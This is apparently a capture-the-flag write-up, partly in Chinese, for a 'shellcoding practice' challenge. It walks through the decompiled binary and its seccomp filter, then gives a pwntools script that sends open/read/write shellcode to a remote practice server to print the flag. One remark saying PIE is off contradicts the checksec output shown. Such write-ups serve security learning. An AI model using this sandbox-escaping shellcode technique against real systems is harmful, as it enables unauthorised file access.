pwnable_asm
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
64位,没开pie
int __cdecl main(int argc, const char **argv, const char **envp)
{
size_t v3; // rdx
char *s; // [rsp+18h] [rbp-8h]
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
puts("Welcome to shellcoding practice challenge.");
puts("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.");
puts("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.");
puts("If this does not challenge you. you should play 'asg' challenge :)");
s = (char *)mmap((void *)0x41414000, 0x1000uLL, 7, 50, 0, 0LL);
memset(s, 144, 0x1000uLL);
v3 = strlen(stub);
memcpy(s, stub, v3);
printf("give me your x64 shellcode: ");
read(0, s + 46, 0x3E8uLL);
alarm(0xAu);
chroot("/home/asm_pwn");
sandbox("/home/asm_pwn");
((void (__fastcall *)(const char *))s)("/home/asm_pwn");
return 0;
}
没啥难度,开辟了0x41414000~0x41415000
权限为7
有个沙盒,用seccomp-tools dump ./pwn
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x09 0xc000003e if (A != ARCH_X86_64) goto 0011
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x06 0xffffffff if (A != 0xffffffff) goto 0011
0005: 0x15 0x04 0x00 0x00000000 if (A == read) goto 0010
0006: 0x15 0x03 0x00 0x00000001 if (A == write) goto 0010
0007: 0x15 0x02 0x00 0x00000002 if (A == open) goto 0010
0008: 0x15 0x01 0x00 0x0000003c if (A == exit) goto 0010
0009: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0011
0010: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0011: 0x06 0x00 0x00 0x00000000 return KILL
只能用orw了
并且我们read的地方也是这里,也给了很大的写入空间,直接写orw的shellcode
from pwn import*
from Yapack import *
context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",26379,"./pwn",10)
orw_shellcode = asm(shellcraft.open('flag') + shellcraft.read('rax', 0x41414000 + 0x100, 0x30) + shellcraft.write(1, 0x41414000 + 0x100, 0x30))
sl(orw_shellcode)
ia()